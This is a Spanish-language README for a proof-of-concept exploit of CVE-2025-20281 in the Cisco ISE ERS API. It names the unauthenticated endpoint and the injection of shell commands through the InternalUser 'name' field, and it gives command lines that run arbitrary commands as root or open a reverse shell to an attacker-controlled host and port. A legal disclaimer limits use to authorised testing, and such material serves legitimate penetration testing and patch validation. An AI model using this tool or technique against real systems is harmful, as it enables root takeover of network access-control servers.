
Exploit de ejecución remota de código sin autenticación para CVE-2025-20281 en la API ERS de Cisco ISE. Ejecuta comandos o lanza shells inversas como root — no se requiere autenticación.
Este repositorio contiene un exploit de prueba de concepto en Python 3 para CVE-2025-20281, una vulnerabilidad crítica en Cisco Identity Services Engine (ISE) que permite ejecución remota de código (RCE) no autenticada como root a través de la API ERS.
El endpoint
/ers/sdk#_de ERS de Cisco ISE no valida la autenticación al procesar solicitudes de creación de usuarios.
Al inyectar comandos de shell en el parámetronamedel objetoInternalUser, los atacantes pueden lograr la ejecución de comandos como root.
--cmd)--whoami--reverse)python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]
Comando de prueba:
python3 CVE-2025-20281.py 192.168.1.10 --whoami
Ejecutar comando personalizado:
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"
Reverse shell:
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444
⚠️ Aviso legal
Este código se proporciona únicamente con fines educativos y de pruebas autorizadas. No utilices este software contra redes o sistemas que no poseas o para los que no tengas permiso de pruebas.
Vulnerabilidad: Divulgada a través del aviso de seguridad de Cisco
PoC Refactor: illdeed